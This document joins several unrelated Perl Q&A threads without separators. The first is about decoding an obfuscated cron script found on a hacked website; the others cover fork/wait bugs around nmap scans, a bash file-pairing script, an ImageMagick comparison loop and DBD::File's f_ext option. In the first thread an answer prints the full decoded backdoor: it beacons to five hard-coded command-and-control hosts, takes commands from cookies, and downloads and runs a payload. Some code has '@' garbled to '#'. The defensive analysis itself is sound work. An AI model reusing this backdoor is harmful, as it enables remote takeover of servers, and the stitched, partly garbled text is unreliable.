I was cleaning out a client's site that got hacked after I had cleaned it once already, when I found a cron job pointing to a script in the server's /tmp directory:
https://pastebin.com/uXCSXxdn
The first 6 lines look like this:
my $gVcoQXKQ='';$gVcoQXKQ.=$_ while(<DATA>);$gVcoQXKQ=unpack('u*',$gVcoQXKQ);$gVcoQXKQ=~s/295c445c5f495f5f4548533c3c3c3d29/616962786d6065606062697f7f7c6360/gs;eval($gVcoQXKQ);
__DATA__
M(R$O=7-R+V)I;B]P97)L("UW"G5S92!S=')I8W0["G5S92!03U-)6#L*=7-E
M($E/.CI3;V-K970["G5S92!)3SHZ4V5L96-T.PHD?"`](#$[("9M86EN*"D[
M"G-U8B!M86EN"GL*97AI="`P('5N;&5S<R!D969I;F5D("AM>2`D<&ED(#T#
The rest is just 121 more lines of that DATA block. I ran the file through VirusTotal and it came back clean, but I am certain this file is malicious. Is there any way to safely decode it so I know where to look and see whether it dropped another payload somewhere on the site?
If you want to see the deobfuscated code, here are the steps to do it. Note that what you will be doing is dangerous, because if you accidentally execute the code, your machine will be attacked. You are warned.
Note that these steps are for THIS EXAMPLE only. Other attack scripts may have other things in them. They may need other changes than what is detailed below.
Here are the steps for the original example that was posted.
Copy all of your program into original.pl. It will look like this:
my $gVcoQXKQ='';$gVcoQXKQ.=$_ while(<DATA>);$gVcoQXKQ=unpack('u*',$gVcoQXKQ);$gVcoQXKQ=~s/295c445c5f495f5f4548533c3c3c3d29/616962786d6065606062697f7f7c6360/gs;print($gVcoQXKQ);
__DATA__
M(R$O=7-R+V)I;B]P97)L("UW"G5S92!S=')I8W0["G5S92!03U-)6#L*=7-E
Change the eval on the first line to print. IF YOU DON'T CHANGE THE eval TO print, THEN THE NEXT STEP WILL PERFORM THE ATTACK ON YOUR MACHINE.
Now, run the program, after you have changed the eval to print.
perl original.pl > unencoded.pl
The new unencoded.pl program will look like this, with no indentation:
#!/usr/bin/perl -w
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
Now use the B::Deparse module to interpret and reformat the program. MAKE SURE YOU HAVE -MO=Deparse OR ELSE YOU WILL RUN THE ATTACK.
perl -MO=Deparse unencoded.pl > formatted.pl # Note the -MO=Deparse!!!
Running it through the Deparse module will report:
unencoded.pl syntax OK
The new formatted.pl program will be a nicely formatted copy of the attacker's payload, 213 lines long, and you can examine what the script does. Note that the final program is still dangerous, because it is the attack program that the attacker wanted to run.
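If you would rather not run the attacker's script at all, even with eval changed to print, a short one-liner can uudecode the DATA block directly. This is only a sketch for this particular sample: it assumes the file was saved as original.pl, and it skips the script's own s/// substitution, which merely swaps the hard-coded cookie value inside the decoded text.
perl -ne 'print unpack("u", $_) if $seen; $seen ||= /^__DATA__$/' original.pl > unencoded.pl
The result is an unencoded.pl you can feed to B::Deparse just as above.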
The format shown is simply uuencoding. I copied the pastebinned text and pasted it into https://www.browserling.com/tools/uudecode, which showed that it is this not-actually-obfuscated Perl code:
#!/usr/bin/perl -w
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
$| = 1; &main();
sub main
{
exit 0 unless defined (my $pid = fork);
exit 0 if $pid;
POSIX::setsid();
$SIG{$_} = "IGNORE" for (qw (HUP INT ILL FPE QUIT ABRT USR1 SEGV USR2 PIPE ALRM TERM CHLD));
umask 0;
chdir "/";
open (STDIN, "</dev/null");
open (STDOUT, ">/dev/null");
open (STDERR, ">&STDOUT");
my $url = ["5.135.42.98:80","ixjeunsdms.org:80","95.216.98.49:443","heyhajksds.com:443","skjfdnlakdp.net:80"];
my $rnd = ["a".."z", "A".."Z"]; $rnd = join ("", #$rnd[map {rand #$rnd}(1..(6 + int rand 5))]);
my $dir = "/var/tmp"; if (open (F, ">", "/tmp/$rnd")) { close F; unlink "/tmp/$rnd"; $dir ="/tmp"; }
my ($header, $content);
my ($link, $file, $id, $command, $timeout) = ("en.wikipedia.org", "index.html", 1, 96, 10);
foreach my $rs (@$url)
{
$header = "$dir/" . time; $content = $header . "1";
unlink $header if -f $header; unlink $content if -f $content;
&http($rs, $timeout, $header, $content, 0);
if (open (F, "<", $header))
{
flock F, 1;
my ($test, $task) = (0, "");
while (<F>)
{
s/^\s*([^\s]?.*)$/$1/;
s/^(.*[^\s])\s*$/$1/;
next unless length $_;
$test ++ if $_ eq "HTTP/1.0 200 OK" || $_ eq "Connection: close"; $task = $1 if /^Set-Cookie: PHPSESSID=([^;]+)/;
}
close F;
($link, $file, $id, $command, $timeout) = &decxd($task) if $test == 2 && length $task;
}
unlink $header if -f $header; unlink $content if -f $content;
}
exit 0 if !defined $command || $command !~ /^16$/;
$header = "$dir/" . time; $content = "$dir/$file";
unlink $header if -f $header; unlink $content if -f $content;
&http($link, $timeout, $header, $content, 1);
my ($resp, $size) = ("000", 0);
if (open (F, "<", $header))
{
flock F, 1;
while (<F>)
{
s/^\s*([^\s]?.*)$/$1/;
s/^(.*[^\s])\s*$/$1/;
next unless length $_;
$resp = $1 if /^HTTP\S+\s+(\d\d\d)/;
}
close F;
}
$size = (stat $content)[7] if -f $content;
$size = 0 if !defined $size || $size !~ /^\d+$/;
if ($size > 0)
{
chmod 0755, $content;
system "perl $content >/dev/null 2>&1";
}
unlink $header if -f $header; unlink $content if -f $content;
foreach my $rs (@$url)
{
$header = "/dev/null"; $content = $header;
&http($rs, 10, $header, $content, 0, "$id.$resp.$size");
}
exit 0;
}
sub xorl
{
my ($line, $code, $xor, $lim) = (shift, "", 1, 16);
foreach my $chr (split (//, $line))
{
if ($xor == $lim)
{
$lim = 0 if $lim == 256;
$lim += 16;
$xor = 1;
}
$code .= pack ("C", unpack ("C", $chr) ^ $xor);
$xor ++;
}
return $code;
}
sub decxd
{
my $data = pack ("H*", shift);
@_ = unpack ("C5", substr ($data, 0, 5, ""));
return (&xorl(substr ($data, 0, shift, "")), &xorl(substr ($data, 0, shift, "")), @_);
}
sub http
{
my ($url, $timeout, $header, $content, $mode, $gecko) = @_;
$gecko = "20100101" if !defined $gecko || !length $gecko;
my ($host, $port, $path) = $url =~ /^([^\/:]+):*(\d*)?(\/?[^\#]*)/;
return unless $host;
my $addr = gethostbyname $host;
return unless $addr;
$port ||= 80;
$path ||= "/";
$addr = sockaddr_in($port, $addr);
my $readers = IO::Select->new() or return;
my $writers = IO::Select->new() or return;
my $buffer = join
(
"\x0D\x0A",
"GET $path HTTP/1.1",
"Host: $host",
"Cookie: PHPSESSID=295c445c5f495f5f4548533c3c3c3d29",
"User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/$gecko Firefox/60.0",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.8,*/*;q=0.1",
"Accept-Language: en-us,en;q=0.8",
"Accept-Encoding: gzip, deflate",
"Accept-Charset: ISO-8859-1,utf-8;q=0.1,*;q=0.8",
"Connection: close",
"\x0D\x0A"
);
if ($mode)
{
$buffer = join
(
"\x0D\x0A",
"GET $path HTTP/1.0",
"Host: $host",
"User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/$gecko Firefox/61.0",
"Accept: text/html,*/*",
"Connection: close",
"\x0D\x0A"
);
}
my $socket = IO::Socket::INET->new(Proto => "tcp", Type => SOCK_STREAM);
return unless $socket;
$socket->blocking(0);
unless ($socket->connect($addr))
{
unless ($! == POSIX::EINPROGRESS)
{
close $socket;
return;
}
}
$writers->add($socket);
$timeout += time;
my $step = 0;
while (1)
{
IO::Select->select(undef, undef, undef, 0.02);
my $writable = (IO::Select->select(undef, $writers, undef, 0))[1];
foreach my $handle (@$writable)
{
if ($step == 0)
{
$step = 1 if $handle->connected;
}
if ($step == 1)
{
my $result = syswrite ($handle, $buffer);
if (defined $result && $result > 0)
{
substr ($buffer, 0, $result) = "";
if (!length $buffer)
{
$readers->add($handle);
$writers->remove($handle);
$step = 2;
}
}
elsif ($! == POSIX::EWOULDBLOCK)
{
next;
}
else
{
$timeout = 0;
}
}
}
my $readable = (IO::Select->select($readers, undef, undef, 0))[0];
foreach my $handle (@$readable)
{
next if $step < 2;
my $result;
if ($step == 2)
{
$result = sysread ($handle, $buffer, 8192, length $buffer);
}
else
{
$result = sysread ($handle, $buffer, 8192);
}
if (16384 < length $buffer)
{
$timeout = 0;
}
elsif (defined $result)
{
if ($result > 0)
{
if ($step == 2)
{
my $offset = index ($buffer, "\x0D\x0A\x0D\x0A");
next if $offset < 0;
if (open (F, ">>", $header))
{
flock F, 2;
binmode F;
print F substr ($buffer, 0, $offset);
close F;
}
substr ($buffer, 0, $offset + 4) = "";
$step = 3;
}
if ($step == 3)
{
if (length $buffer)
{
$buffer =~ s/%EHLO_VALUE%/295c445c5f495f5f4548533c3c3c3d29/gs;
if (open (F, ">>", $content))
{
flock F, 2;
binmode F;
print F $buffer;
close F;
}
$buffer = "";
}
}
next;
}
$timeout = 0;
}
elsif ($! == POSIX::EWOULDBLOCK)
{
next;
}
else
{
$timeout = 0;
}
}
if ($timeout < time)
{
foreach my $handle ($writers->handles, $readers->handles)
{
$writers->remove($handle) if $writers->exists($handle);
$readers->remove($handle) if $readers->exists($handle);
close $handle;
}
return;
}
}
}
The clues were a) recognising the distinctive format and b) recognising the unpack('u*'). No machines, virtual or otherwise, were put at risk in this process.
The code has 5 URLs, and the http function implies it "phones home" to those, getting commands to execute in a Set-Cookie: PHPSESSID= header. I haven't analysed it further than that.
Replace eval with print to see what the script is running. The portion you provided generates readable code.
My first thought was to deparse it but that won't be of much use since most of the code is in the DATA block. You could replace the eval() function with print() and let the script decode it for you. You might end up needing deparse for what print gives you.
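If you prefer not to edit the file by hand, the eval-to-print swap can also be scripted. A sketch, assuming the cron script was saved as original.pl and that eval( occurs only in that one spot, as in the posted sample:
perl -pe 's/\beval\(/print(/' original.pl > printer.pl
perl printer.pl > unencoded.pl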
I am having an issue with my first attempt at using fork.
The script seems to run fine until the forked children should finish and control should return to the main script.
Instead it exits the script entirely.
my @files = glob( "./input/<Input subnets>.txt" ) or die "Can't open HostInventory$!"; # Open the Host Inventory csv files for parsing
foreach my $file ( @files ) {
open (CONFIG, '<', $file) or die "Can't <Input subnets>.txt$!";
my @lines = <CONFIG>;
chomp (@lines);
$m = scalar @lines / 10;
for ( $m ) {
s/\..*//g
};
for ( my $i = 0; $i < @lines; $i += $m ) {
# take a slice of elements from @files
my @lines4 = @lines[$i .. $i + $m];
if ( fork() == 0 ) {
for my $n ( @lines4 ) {
system("Nmap -dns-servers <IP of DNS server> -sn -v $n -oX ./input/ip360_DNS/ip360_DNS$n.xml --send-eth --reason");
}
exit;
}
}
wait for 0 .. @lines/$m;
}
At this point it should continue in the parent script and call a subroutine that parses the output of the scan. Instead it exits the script completely.
What am I doing wrong?
-=-=-=-=Update-=-=-=-=
I tried the Parallel::ForkManager example below. When run as a standalone process it works perfectly. I am running the code inside of a subroutine, though, and when I try that, the Perl interpreter crashes. Suggestions?
#!/usr/bin/perl -w
use Parallel::ForkManager;
use strict; # Best Practice
use warnings; # Best Practice
use Getopt::Long; # Add the ability to use command line options
if (!@ARGV) {
&help;
exit 1
}
GetOptions(
full => \&full,
temp => \&temp,
);
#######################################################################
#######################################################################
# #
# Call each function #
# #
#######################################################################
#######################################################################
sub temp {
&speak;
&simple;
&speak2;
exit;
}
sub full {
&speak;
&simple;
&speak2;
exit;
}
sub speak {
print "This is where I wait for 2 seconds\n";
sleep (2);
}
my $process = $$;
print "$process\n";
sub simple {
my $pm = new Parallel::ForkManager(10);
$pm->run_on_finish(
sub { $process;
print "** PID $process\n";
}
);
my #files = glob( "./ping.txt" ) or die "Can't open CMS HostInventory$!"; # Open the CMS Host Inventory csv files for parsing
foreach my $file (#files){
open (CONFIG, '<', $file) or die "Can't ip360_DNS File$!";
my #lines = <CONFIG>;
chomp (#lines);
foreach my $n (#lines) {
# Forks and returns the pid for the child:
my $pid = $pm->start and next;
# ... do some work with $data in the child process ...
system("ping $n >> ./input/$n.txt");
}
$pm->finish; # Terminates the child process
}
}
sub speak2 {
print "In new subroutine\n";
}
First of all, your script doesn't "exit completely". It does wait for the children to finish. Or at least some of them. Your calculations are a little off.
You're skipping the last elements.
$m = scalar @lines / 10;
for ($m) {s/\..*//g};
is equivalent to
use POSIX qw( floor );
my $m = floor(@lines / 10);
but it should be
use POSIX qw( ceil );
my $m = ceil(@lines / 10);
You're performing the boundary elements twice.
my @lines4 = @lines[$i .. $i + $m];
should be
my @lines4 = @lines[$i .. $i + $m - 1];
wait for 0 .. @lines/$m;
should be
use POSIX qw( ceil );
wait for 1 .. ceil(@lines/$m);
or just
1 while wait > 0;
Easier to use Parallel::ForkManager.
use Parallel::ForkManager qw( );
my $pm = Parallel::ForkManager->new(10); # Max number of children at a time.
$pm->run_on_finish(sub {
my ($pid, $exit, $id, $signaled, $dumped, $data) = @_;
my ($config_qfn, $target) = @$id;
...
});
for my $config_qfn (glob(...)) {
open(my $config_fh, '<', $config_qfn)
or die("Can't open \"$config_qfn\": $!\n");
chomp( my @targets = <$config_fh> );
for my $target (@targets) {
my $pid = $pm->start([$config_qfn, $target])
and next;
exec(...)
or die("exec: $!");
}
}
$pm->wait_all_children();
By the way, you may have noticed I stopped doing things in batches. This allowed me to use exec instead of system, which reduces the number of forks by one for each batch, making it more efficient to not use batches.
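For illustration, here is a minimal sketch of that difference (the hosts are placeholders, and ping -c is the Unix flag): each child exec()s its command directly, so there is exactly one fork per command instead of a fork for the child plus another one inside system.
use strict;
use warnings;
for my $host ("192.0.2.1", "192.0.2.2") {
    my $pid = fork();
    die("fork: $!") if !defined $pid;
    if ($pid == 0) {
        exec("ping", "-c", "1", $host)   # child is replaced by ping; no extra fork
            or die("exec: $!");
    }
}
1 while wait > 0;   # reap all children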
I have a growing number of files to process using a simple Perl script I wrote. The script takes two files as input and prints an output. I want to use a bash script (or anything really) to automate the following usage:
perl Program.pl GeneLevels_A GeneLevels_B > GeneLevels_A_B
with every paired, non-directional combination of files in a particular directory.
Here is the Perl script:
#!/usr/bin/perl
use strict;
use warnings;
die "Usage: $0 <File_1> <File_2>\n" unless #ARGV == 2;
my $file1 = shift #ARGV;
my $file2 = shift #ARGV;
my %hash1;
my %hash2;
my $counter = 0;
my $amt = 25;
my $start = 244 - $amt;
open (REF, $file1);
while (<REF>) {
my $line = $_;
chomp $line;
if ($counter < $start) {
$counter++;
next;
}
my @cells = split('\t', $line);
my $ID = $cells[2];
my $row = $cells[0];
$hash1{$ID} = $row;
$counter++;
}
close REF;
$counter = 0;
open (FILE, $file2);
while (<FILE>) {
my $line = $_;
chomp $line;
if ($counter < $start) {
$counter++;
next;
}
my @cells = split('\t', $line);
my $ID = $cells[2];
my $row = $cells[0];
$hash2{$ID} = $row;
$counter++;
}
close FILE;
while ( my ($key, $value) = each(%hash1) ) {
if ( exists $hash2{$key} ) {
print "$key\t$value\t$hash2{$key}\n";
}
}
A good solution would allow me to run the Perl script on every file with an appropriate suffix.
An even better solution would assess the suffixes of existing files to determine which pairs of files have already been processed this way and omit those. For example if File_A, File_B, File_C, and File_B_C exist then only File_A_B and File_A_C would be produced. Note that File_A_B and File_B_A are equivalent.
This should work. Better checks for bad arguments would be a good thing to add:
#!/bin/bash
if [ $# != 2 ]; then
echo "usage: pair <suffix1> <suffix2>"
exit
fi
suffix1=$1
suffix2=$2
for file1 in *_${suffix1}; do
fileCheck=$(echo $file1 | sed -e "s#_$suffix2##")
if [ "$fileCheck" = "$file1" ]; then
file2=${file1/_$suffix1/_$suffix2}
if [[ ( ! -f ${file1}_${suffix2} ) && ( ! -f ${file2}_${suffix1} ) ]]; then
echo processing ${file1}_${suffix2}
perl Program.pl $file1 $file2 > ${file1}_${suffix2}
fi
fi
done
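Assuming the script above is saved as pair.sh and made executable, an invocation matching the example in the question would be:
./pair.sh A B    # runs: perl Program.pl GeneLevels_A GeneLevels_B > GeneLevels_A_B
To cover every non-directional pair of suffixes, call it once per pair.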
I wrote a program to compare the image files of two folders (having 1000 files each) with some logic (see this SO question).
While executing, it compares successfully until about 900 images, but then it gives an error like Use of uninitialized value within @tfiles2 in concatenation (.) or string at C:\dropbox\Image_Compare\image_magick.pl line 55 (#3).
Then I get a popup error like Perl Command Line Interpreter has stopped working, so I close the program.
My code is as follows:
#!/usr/bin/perl
use Image::Magick;
no warnings 'uninitialized';
use warnings;
use diagnostics;
#use strict;
use List::Util qw(first);
my $directory1="C:/dropbox/Image_Compare/folder1";
opendir(DIR, $directory1) or die "couldn't open $directory1: $!\n";
my @files1 = grep { (!/^\./) && -f "$directory1/$_" } readdir(DIR);
closedir DIR;
print @files1;
print 'end of files1';
my $directory2="C:/dropbox/Image_Compare/folder2";
opendir(DIR, $directory2) or die "couldn't open $directory2: $!\n";
my @files2 = grep { (!/^\./) && -f "$directory2/$_" } readdir(DIR);
closedir DIR;
print @files2;
print 'end of files2';
print $files1[0];
foreach my $fils2 (@files2)
{
$g1 = Image::Magick->new;
$g2 = Image::Magick->new;
$temp1 = $g1->Read( filename=>"C:/dropbox/Image_Compare/folder1/".$files1[0]."");
$temp1 = $g2->Read( filename=>"C:/dropbox/Image_Compare/folder2/".$fils2."");
$g3 = $g1->Compare( image=>$g2, metric=>'AE' ); # compare
$error1 = $g3->Get( 'error' );
#print $error1;
if ($error1 == '0')
{
print "Matching image is:";
print $fils2 . "\n";
my $tdirectory2="C:/dropbox/Image_Compare/folder2";
opendir(DIR, $tdirectory2) or die "couldn't open $directory2: $!\n";
my @tfiles2 = grep { (!/^\./) && -f "$tdirectory2/$_" } readdir(DIR);
closedir DIR;
#my $index = firstidx { $_ eq'"' .$fils2.'"' } @tfiles2;
my $index = first { $tfiles2[$_] eq $fils2} 0..$#tfiles2;
#print $fils2;
print $index;
my $i=0;
foreach my $fils1 (@files1)
{
print 'ganesh';
print $files1[$i];
print $tfiles2[$index];
print 'gowtham'; print "<br />";
#print @tfiles2;
$g4 = Image::Magick->new;
$g5 = Image::Magick->new;
$temp2 = $g4->Read( filename=>"C:/dropbox/Image_Compare/folder1/".$files1[$i]."");
$temp2 = $g5->Read( filename=>"C:/dropbox/Image_Compare/folder2/".$tfiles2[$index]."");
$g6 = $g4->Compare( image=>$g5, metric=>'AE' ); # compare
$error2 = $g6->Get( 'error' );
$i++;
$index++;
if ($error2 == '0') {}
else {print "Image not matching:"; print $tfiles2[$index]; last;}
#if ($i == '800') {last;}
}
last
}
}
Can anyone please help me find where I am making a mistake?
Folder 1 file names: 0025.bmp to 1051.bmp;
Folder 2 file names: 0000.bmp to 1008.bmp;
Thanks
Ganesh
I don't know which line is the offending one, but one of these is likely to be the candidate:
$temp2 = $g5->Read( filename=>"C:/dropbox/Image_Compare/folder2/".$tfiles2[$index]."");
or
else {print "Image not matching:"; print $tfiles2[$index]; last;}
Do note that you increment $index whether or not it is inside the array bounds. You do not check for the condition $index > $#tfiles2, which should break the loop.
You might want to assert that both input arrays contain >> 900 elements, by printing the length like print "length: ", scalar @array, "\n";.
You can test at which index the undefined error actually happens by testing for definedness of the elements in the arrays:
if (not defined $tfiles2[$index] or not defined $files1[$i]) {
die "There was an undefined element at index=$index, i=$i";
}
But then again, the offset between $i and $index is constant (as mentioned in my answer), so you don't have to actually carry two variables.
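As a sketch of that idea (names borrowed from the question; $offset stands for the position in @tfiles2 that matched $files1[0]):
my $offset = $index;                 # constant difference between the two counters
for my $i (0 .. $#files1) {
    my $j = $i + $offset;
    last if $j > $#tfiles2;          # stop instead of reading past the end of @tfiles2
    print "comparing $files1[$i] against $tfiles2[$j]\n";
}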
A simple comparator subroutine could make your code more readable, thus aiding debugging (see procedural programming).
# return true if matching, false otherwise.
sub compare_images {
my ($file1, $file2) = @_;
my $image1 = Image::Magick->new;
$image1->Read(filename => $file1);
my $image2 = Image::Magick->new;
$image2->Read(filename => $file2);
my $result = $image1->Compare(image => $image2, metric => 'AE')->Get('error');
# free memory
undef $image1;
undef $image2;
return 0 == $result;
}
called like
my $image_root = "C:/dropbox/Image_Compare";
my ($folder1, $folder2) = qw(folder1 folder2);
unless (compare_images("$image_root/$folder1/$files1[$i]",
"$image_root/$folder2/$tfiles[$index]")) {
print "Images not matching at index=$index, i=$i\n";
print "filename: $tfiles[$index]\n";
last;
}
You could read your directories like
sub get_images_from_dir {
my ($dirname) = @_;
-d $dirname or die qq(The path "$dirname" doesn't point to a directory!);
opendir my $dir => $dirname or die qq(Can't open "$dirname": $!);
my @files = grep {!/^\./ and -f "$dirname/$_"} readdir $dir;
closedir $dir;
unless (@files) { die qq(There were no interesting files in "$dirname".) }
return #files;
}
Steps like these make code more readable and make it easy to insert checks.
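Wired together, the two helpers might be used like this (just a sketch; the paths are the ones from the question):
my @files1  = get_images_from_dir("C:/dropbox/Image_Compare/folder1");
my @tfiles2 = get_images_from_dir("C:/dropbox/Image_Compare/folder2");
if (compare_images("C:/dropbox/Image_Compare/folder1/$files1[0]",
                   "C:/dropbox/Image_Compare/folder2/$tfiles2[0]")) {
    print "First images match\n";
}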
This is from the DBD::File documentation:
f_ext
This attribute is used for setting the file extension where (CSV) files are opened. There are several possibilities.
DBI:CSV:f_dir=data;f_ext=.csv
In this case, DBD::File will open only table.csv if both table.csv and table exist in the datadir. The table will still be named table. If your datadir has files with extensions, and you do not pass this attribute, your table is named table.csv, which is probably not what you wanted. The extension is always case-insensitive. The table names are not.
DBI:CSV:f_dir=data;f_ext=.csv/r
In this case the extension is required, and all filenames that do not match are ignored.
It was not possible for me to generate different behavior with the two options ".csv/r" and ".csv". Could someone show me an example, where I can see the difference between ".csv/r" and ".csv"?
I can't seem to get it to do anything different either. The relevant section of code is
sub file2table
{
my ($data, $dir, $file, $file_is_tab, $quoted) = @_;
$file eq "." || $file eq ".." and return;
my ($ext, $req) = ("", 0);
if ($data->{f_ext}) {
($ext, my $opt) = split m/\//, $data->{f_ext};
if ($ext && $opt) {
$opt =~ m/r/i and $req = 1;
}
}
(my $tbl = $file) =~ s/$ext$//i;
$file_is_tab and $file = "$tbl$ext";
# Fully Qualified File Name
my $fqfn;
unless ($quoted) { # table names are case insensitive in SQL
opendir my $dh, $dir or croak "Can't open '$dir': $!";
my @f = grep { lc $_ eq lc $file } readdir $dh;
@f == 1 and $file = $f[0];
closedir $dh or croak "Can't close '$dir': $!";
}
$fqfn = File::Spec->catfile ($dir, $file);
$file = $fqfn;
if ($ext) {
if ($req) {
# File extension required
$file =~ s/$ext$//i or return;
}
else {
# File extension optional, skip if file with extension exists
grep m/$ext$/i, glob "$fqfn.*" and return;
$file =~ s/$ext$//i;
}
}
$data->{f_map}{$tbl} = $fqfn;
return $tbl;
} # file2table
Does this demonstrate the difference?:
sandbox % echo "a,b,c" > foo
sandbox % echo "a,b,c" > foo.csv
sandbox % echo "a,b,c" > bar
sandbox % echo "a,b,c" > baz.csv
sandbox % perl -MDBI -wle'print for DBI->connect("dbi:CSV:f_ext=.csv")->tables'
"merijn".baz
"merijn".bar
"merijn".foo
sandbox % perl -MDBI -wle'print for DBI->connect("dbi:CSV:f_ext=.csv/r")->tables'
"merijn".baz
"merijn".foo
sandbox %
f_ext=.csv only makes the .csv a preference, but not a requirement: in the first case, the file "bar" with no .csv extension is still used, but "foo.csv" is chosen over "foo". With f_ext=.csv/r, "bar" is ignored, as it has no ".csv" extension.
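The difference also shows up when you query. A minimal sketch, using the file names from the transcript above (with /r, only files carrying the .csv extension are visible as tables):
use DBI;
my $dbh = DBI->connect("dbi:CSV:f_ext=.csv/r", undef, undef, { RaiseError => 1 });
my $rows = $dbh->selectall_arrayref("SELECT * FROM foo");   # reads foo.csv
# "SELECT * FROM bar" would fail here, because bar has no .csv extension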
Now in version 0.39 of DBD::File this part looks like this:
sub file2table
{
my ($self, $meta, $file, $file_is_table, $respect_case) = @_;
$file eq "." || $file eq ".." and return; # XXX would break a possible DBD::Dir
my ($ext, $req) = ("", 0);
if ($meta->{f_ext}) {
($ext, my $opt) = split m/\//, $meta->{f_ext};
if ($ext && $opt) {
$opt =~ m/r/i and $req = 1;
}
}
# (my $tbl = $file) =~ s/$ext$//i;
my ($tbl, $dir, $user_spec_file);
if ($file_is_table and defined $meta->{f_file}) {
$tbl = $file;
($file, $dir, undef) = File::Basename::fileparse ($meta->{f_file});
$user_spec_file = 1;
}
else {
($tbl, $dir, undef) = File::Basename::fileparse ($file, $ext);
$user_spec_file = 0;
}
-d File::Spec->catdir ($meta->{f_dir}, $dir) or
croak (File::Spec->catdir ($meta->{f_dir}, $dir) . ": $!");
!$respect_case and $meta->{sql_identifier_case} == 1 and # XXX SQL_IC_UPPER
$tbl = uc $tbl;
!$respect_case and $meta->{sql_identifier_case} == 2 and # XXX SQL_IC_LOWER
$tbl = lc $tbl;
my $searchdir = File::Spec->file_name_is_absolute ($dir)
? $dir
: Cwd::abs_path (File::Spec->catdir ($meta->{f_dir}, $dir));
$searchdir eq $meta->{f_dir} and
$dir = "";
unless ($user_spec_file) {
$file_is_table and $file = "$tbl$ext";
# Fully Qualified File Name
my $cmpsub;
if ($respect_case) {
$cmpsub = sub {
my ($fn, undef, $sfx) = File::Basename::fileparse ($_, qr/\.[^.]*/);
$fn eq $tbl and
return (lc $sfx eq lc $ext or !$req && !$sfx);
return 0;
}
}
else {
$cmpsub = sub {
my ($fn, undef, $sfx) = File::Basename::fileparse ($_, qr/\.[^.]*/);
lc $fn eq lc $tbl and
return (lc $sfx eq lc $ext or !$req && !$sfx);
return 0;
}
}
opendir my $dh, $searchdir or croak "Can't open '$searchdir': $!";
my @f = sort { length $b <=> length $a } grep { &$cmpsub ($_) } readdir $dh;
@f > 0 && @f <= 2 and $file = $f[0];
!$respect_case && $meta->{sql_identifier_case} == 4 and # XXX SQL_IC_MIXED
($tbl = $file) =~ s/$ext$//i;
closedir $dh or croak "Can't close '$searchdir': $!";
#(my $tdir = $dir) =~ s{^\./}{}; # XXX We do not want all tables to start with ./
#$tdir and $tbl = File::Spec->catfile ($tdir, $tbl);
$dir and $tbl = File::Spec->catfile ($dir, $tbl);
my $tmpfn = $file;
if ($ext) {
if ($req) {
# File extension required
$tmpfn =~ s/$ext$//i or return;
}
# else {
# # File extension optional, skip if file with extension exists
# grep m/$ext$/i, glob "$fqfn.*" and return;
# $tmpfn =~ s/$ext$//i;
# }
}
}
my $fqfn = File::Spec->catfile ($searchdir, $file);
my $fqbn = File::Spec->catfile ($searchdir, $tbl);
$meta->{f_fqfn} = $fqfn;
$meta->{f_fqbn} = $fqbn;
!defined $meta->{f_lockfile} && $meta->{f_lockfile} and
$meta->{f_fqln} = $meta->{f_fqbn} . $meta->{f_lockfile};
$meta->{table_name} = $tbl;
return $tbl;
} # file2table
As far as I can see, the two f_ext options are working as expected.